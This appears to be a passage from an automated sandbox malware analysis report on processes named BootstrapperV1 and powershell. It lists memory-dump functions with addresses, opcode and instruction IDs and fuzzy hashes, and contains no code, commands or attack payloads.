                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: f466597237a1fae831711827ca9a72f05df91a6688bdb2f981fc4e129704ecf8
                                                                                                                                                                                                                                              • Instruction ID: 77dd86e3648ad1af051343aff82386c32a1b9fd52dd6fa3612a2976aaec7d657
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f466597237a1fae831711827ca9a72f05df91a6688bdb2f981fc4e129704ecf8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 78E0D852E0E7D40FE7AB623859662A53FA09F46210F0900EFC588C76E3D88D9C4D4386
                                                                                                                                                                                                                                              Function 00007FFB4B0E3E40 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: b2a1a401075dc92ccb22e0cde4212507af31ca28d6d8307d9375fcfecc910b10
                                                                                                                                                                                                                                              • Instruction ID: 0930df2421a8b6f422474577f5b0617ffe4b0113e84f5e12acd66f2419995ff3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b2a1a401075dc92ccb22e0cde4212507af31ca28d6d8307d9375fcfecc910b10
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EBD05E62F1EC6E3691B9B63D79557BD0485DBCC622B8942B2E90DC3399DC08EC8102C4
                                                                                                                                                                                                                                              Function 00007FFB4B0E7EB0 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: c78ecc4f7f718d7e2c8da25ef10b900991956dd181bf7d8a11c1845477738cc3
                                                                                                                                                                                                                                              • Instruction ID: a5dd1676f607fc4232d767140e43e34a8a80bef4cf0a9b995e1f72327ebb979d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c78ecc4f7f718d7e2c8da25ef10b900991956dd181bf7d8a11c1845477738cc3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D8E0C225E0DD4A06EE8CA9398C920603691EFA8208BD44099C509C2391F81ADA82C342
                                                                                                                                                                                                                                              Function 00007FFB4B0E6188 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 9fd3513acbb94f14bb395ae456e300db7c38f81f5a8ebc6029c21a9497038c47
                                                                                                                                                                                                                                              • Instruction ID: f50fe2d701b2e86d2fcfcdaa2670837e3d4b7efaf0be581c9967d561443efc53
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9fd3513acbb94f14bb395ae456e300db7c38f81f5a8ebc6029c21a9497038c47
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9CE0C260C1CB460BE704FE328D4507A71D1BB98202FC88A36D98CD0260EE3CD7D88242
                                                                                                                                                                                                                                              Function 00007FFB4B0E6198 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 691a2f3a06536ee3440fbcbf9ecb7c0123ed8711d37f8a065ab607ce4027d070
                                                                                                                                                                                                                                              • Instruction ID: 57052125ade3123827d56b03cff2564d4336355e73d3edc8e1a9f92c70dd8bdf
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 691a2f3a06536ee3440fbcbf9ecb7c0123ed8711d37f8a065ab607ce4027d070
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C9D02B7081C91515EBA0BA38A1046F563C0CB94312F0405B7FD0DD23B0DC495A8142C5
                                                                                                                                                                                                                                              Function 00007FFB4B0E903A Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 41de1f144ea261981d5b47be965c53e4f68bc96f57bda39cb78378e80b487e37
                                                                                                                                                                                                                                              • Instruction ID: f7d00cf2f4fbc351e7503c2b90b9fa09dfa5cf79570f09bf70b4c4104b0f2337
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 41de1f144ea261981d5b47be965c53e4f68bc96f57bda39cb78378e80b487e37
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F5E08691C0D3C10BE755B6358D561A97FC0AF55251F4886FEC6888A1A6D93CA1848642
                                                                                                                                                                                                                                              Function 00007FFB4B0E04D8 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: cdbbb4cc451a1bc38ec49a8e998f788c13b17b89c3d4d0ca903f4b9ed766e6be
                                                                                                                                                                                                                                              • Instruction ID: 3772011241c6a03ae0a5475b07a6197bde32287ebe95ddbc0b6f0e4529656892
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cdbbb4cc451a1bc38ec49a8e998f788c13b17b89c3d4d0ca903f4b9ed766e6be
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 79D0A760F1D82905FA6D317C65013F81181CF48310F0444FAE91DD26C6DCCD5C8D02C5
                                                                                                                                                                                                                                              Function 00007FFB4B0EEB70 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 1a83d3d35c1a37e25b2de17fbb6ded89f88cf26ad7823b6822420882a32996be
                                                                                                                                                                                                                                              • Instruction ID: 357b349524716e57f52f494bab512cb32993ef64ced095763cc098eee5dcf06d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1a83d3d35c1a37e25b2de17fbb6ded89f88cf26ad7823b6822420882a32996be
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 50E0EC8190F6C92FDE42FB7C856A1997FA09E4B280B1888E9D0888F1A3F008140E8302
                                                                                                                                                                                                                                              Function 00007FFB4B0E09B3 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 53f4c3e0937114a6dd07d5acbce3b32d082a81422b88ea905082a50662f27d5a
                                                                                                                                                                                                                                              • Instruction ID: 19b0a5820474929cc748cfa78fd9397bf71cd51c5f8eaef9706b9d09d844bf11
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 53f4c3e0937114a6dd07d5acbce3b32d082a81422b88ea905082a50662f27d5a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 71D0A79090D9DD5FFA51BFF804166ADAFD18F49280B5401E5C88DD7253D91808438380
                                                                                                                                                                                                                                              Function 00007FFB4B0E3713 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 96d115bdd688fb309cad2923506d8af420a36d87e70b5814269759b240645adf
                                                                                                                                                                                                                                              • Instruction ID: 810a4cd5cc01613bc92af1b88be1742a8651206a943cd7d5b2ee1b2976592032
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 96d115bdd688fb309cad2923506d8af420a36d87e70b5814269759b240645adf
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 20D05B7190894E9FDF84FE68C5426AD7BB1EB99301F544065D14DD3653C53458418740
                                                                                                                                                                                                                                              Function 00007FFB4B0E6AF1 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 3f44e0848ddec73a830f6baf9b09e8a398a95201adf8ef336560d7ef33dc4910
                                                                                                                                                                                                                                              • Instruction ID: 55d7dada68ded64f3a8d6d4e28053c4fc534b83810e84c88d17a461d07524f50
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f44e0848ddec73a830f6baf9b09e8a398a95201adf8ef336560d7ef33dc4910
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 95C08012B1DE090A91917A78F4810F6F251EB841207505976D41FC114EDD1D98874340
                                                                                                                                                                                                                                              Function 00007FFB4B0E0D73 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: ecc07a1cc7674d2c0c2618bd9158f5902e4f7e305b420c0fcb13c16ba229561d
                                                                                                                                                                                                                                              • Instruction ID: 7477e0b91e086a9496a1d246ab684fcd686ba9a605eef975c173008cdc407917
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ecc07a1cc7674d2c0c2618bd9158f5902e4f7e305b420c0fcb13c16ba229561d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B3D05B9060D1821FF347677481553B57B924F43394F4404FDC549471E7DD1964894319
                                                                                                                                                                                                                                              Function 00007FFB4B0E3739 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 3b199c7db29a0555a7ea2d430dad342ee8e14e956db0a55e7f56215082f33101
                                                                                                                                                                                                                                              • Instruction ID: f597784e1c0195ef801e971a820a2905f94c5cf9c95bd4e4737730957c53aee3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3b199c7db29a0555a7ea2d430dad342ee8e14e956db0a55e7f56215082f33101
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B7C08C72F0480C9E8F80FBDCE0016ECBBB0EB8C222F041033D20CF3200CA2014504790

                                                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                                                              Function 00007FFB4B0FA9B1 Relevance: 6.4, Strings: 5, Instructions: 101COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: Pd K$`d K$hd K$pd K$xd K
                                                                                                                                                                                                                                              • API String ID: 0-558404148
                                                                                                                                                                                                                                              • Opcode ID: 2fdff3d6294ab6211186beb813b811ab1a267c3fdfe945654b4a90637149e0e4
                                                                                                                                                                                                                                              • Instruction ID: 0391b93be23d43da4f7afe0df673ec921e38acc7df888e5cc12e324381abd8da
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2fdff3d6294ab6211186beb813b811ab1a267c3fdfe945654b4a90637149e0e4
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 733127A3A0E7C24BE3139B789DE6499BFB0EF0225870C81F6D1C44B197EE19550A8392
                                                                                                                                                                                                                                              Function 00007FFB4B0E88FA Relevance: 6.3, Strings: 5, Instructions: 88COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: M_^$M_^$M_^$M_^$M_^
                                                                                                                                                                                                                                              • API String ID: 0-2396788759
                                                                                                                                                                                                                                              • Opcode ID: bbb93cba44145987be5c536ff951cb8193cfff5e366c6eee88ca36002defd236
                                                                                                                                                                                                                                              • Instruction ID: 67ef20ace988ab08d72295435224ad04edda20041a53e6200317a3276d2d8577
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bbb93cba44145987be5c536ff951cb8193cfff5e366c6eee88ca36002defd236
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7C31AFB3D0DB869FE7165E29CC9A094BBE0EF1121534E42F6C554CF293FE192806C623
                                                                                                                                                                                                                                              Function 00007FFB4B0F91D3 Relevance: 5.2, Strings: 4, Instructions: 205COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: 0G K$@G K$PG K$`G K
                                                                                                                                                                                                                                              • API String ID: 0-862706759
                                                                                                                                                                                                                                              • Opcode ID: 7d8a96f33c54068a4f37b8b335d42e0f0e297600a68fdf78a6d837651be6d351
                                                                                                                                                                                                                                              • Instruction ID: 5e2be0c296c31f4458572c76da27abf20a2d532630dccbdaa453a0af2c57cb80
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7d8a96f33c54068a4f37b8b335d42e0f0e297600a68fdf78a6d837651be6d351
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 555130D3E0D6D50BE352AB7CE9994E97FA0EF532A970880F7C2C84B1A7DC4955098392
                                                                                                                                                                                                                                              Function 00007FFB4B0E88E0 Relevance: 5.1, Strings: 4, Instructions: 97COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: M_^$M_^$M_^$M_^
                                                                                                                                                                                                                                              • API String ID: 0-1397233021
                                                                                                                                                                                                                                              • Opcode ID: 33e3aa48dc31503417993ea4432c1143dc5fd3270246f86a9525e6780537a59e
                                                                                                                                                                                                                                              • Instruction ID: 0758bbe32fadfeb8b89341e612f3dc9a682ead84412158fc8c927752ec9b913f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 33e3aa48dc31503417993ea4432c1143dc5fd3270246f86a9525e6780537a59e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6631A3B3D0D7969FE7166E38D89A0947BE0EF1121530E41F6C5488F293FE192406C627

                                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                                              Function 00007FFB4B0C9F65 Relevance: .2, Instructions: 204COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000005.00000002.1479812271.00007FFB4B0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0C0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_7ffb4b0c0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 684eea5ba7cd99644b94b8437811572b14542a9a0330acfcc9fe195d73b5ef71
                                                                                                                                                                                                                                              • Instruction ID: b3a480005c68334f0b28d70e94d8d17f09cbb16a2f59dc3f680546ea87231fe4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 684eea5ba7cd99644b94b8437811572b14542a9a0330acfcc9fe195d73b5ef71
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AB616BA2D0D6C50BE703AF7CD8A60E57FB0EF5236BB1900F3C5C88A167EA0464578795
                                                                                                                                                                                                                                              Function 00007FFB4B196605 Relevance: 6.7, Strings: 5, Instructions: 439COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000005.00000002.1480179899.00007FFB4B190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B190000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_7ffb4b190000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: (B=K$(B=K$(B=K$(B=K$(B=K
                                                                                                                                                                                                                                              • API String ID: 0-3403963642
                                                                                                                                                                                                                                              • Opcode ID: 339e3ce74726d892aeabf2ccbcc772d6aaeaae6a00386e5f8217c3c776c9853d
                                                                                                                                                                                                                                              • Instruction ID: 24f0f81ed8727b58bbe02f13f2568d2d087d8dd2e75262ed78516654b1ec774e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 339e3ce74726d892aeabf2ccbcc772d6aaeaae6a00386e5f8217c3c776c9853d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1AD155A292EBC94FE796EE78C8552B97BE0EF16314B1801FED58CC70A3D9189805C761
                                                                                                                                                                                                                                              Function 00007FFB4B194073 Relevance: 1.4, Strings: 1, Instructions: 181COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000005.00000002.1480179899.00007FFB4B190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B190000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_7ffb4b190000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: 8>=K
                                                                                                                                                                                                                                              • API String ID: 0-2982680430
                                                                                                                                                                                                                                              • Opcode ID: 81c84346779f5ef003eb323a20bb600ec0635fb80bd660a72b9ff03b1aae4fcf
                                                                                                                                                                                                                                              • Instruction ID: 776d4091a87d3c31ef6b36ceb3b43385669809384ebe3d09c67ae458db862324
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 81c84346779f5ef003eb323a20bb600ec0635fb80bd660a72b9ff03b1aae4fcf
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C9514A72A1CA8A4FE7A9EE3CD5127B577E1EF95224B1840BAC24DC71A3DD14EC05C781
                                                                                                                                                                                                                                              Function 00007FFB4B194370 Relevance: 1.4, Strings: 1, Instructions: 147COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000005.00000002.1480179899.00007FFB4B190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B190000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_7ffb4b190000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: p>=K
                                                                                                                                                                                                                                              • API String ID: 0-4016596924
                                                                                                                                                                                                                                              • Opcode ID: 2de19497e1c32558d7fa736b00afded2e072fd09c094343660a8a6ad50427419
                                                                                                                                                                                                                                              • Instruction ID: ce539833e629fd050825980c26a54626dbca39be2f20d61075b86e91387921d9
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2de19497e1c32558d7fa736b00afded2e072fd09c094343660a8a6ad50427419
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C54136B2A1DA994FE7B9EE3CD4116B477E1EF84224B0800BAD14DC7193E914ED01C791
                                                                                                                                                                                                                                              Function 00007FFB4B1940BF Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000005.00000002.1480179899.00007FFB4B190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B190000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_7ffb4b190000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: 8>=K
                                                                                                                                                                                                                                              • API String ID: 0-2982680430
                                                                                                                                                                                                                                              • Opcode ID: faac21d97b705fe02169668d042639030f51f903ff217708c7711ed0f7ae34dd
                                                                                                                                                                                                                                              • Instruction ID: 083719940e21b0916ccabe7b9f92a2c283f03be7392560c00165cf67b6bdc9b7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: faac21d97b705fe02169668d042639030f51f903ff217708c7711ed0f7ae34dd
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EC21F7A3A2DAC78FF3B9EE2CC65227566E1EF55214B4840BAC25DC75B2CD18EC05C741
                                                                                                                                                                                                                                              Function 00007FFB4B1943BC Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000005.00000002.1480179899.00007FFB4B190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B190000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_7ffb4b190000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: p>=K
                                                                                                                                                                                                                                              • API String ID: 0-4016596924
                                                                                                                                                                                                                                              • Opcode ID: 48dac9943b16e71ade640034c3a218d279322209ff8be362cc6471f02b53cd13
                                                                                                                                                                                                                                              • Instruction ID: a34d764919d1e4ad31079df00dfa08f097213ce9e1d35b62645de5c7e2402813
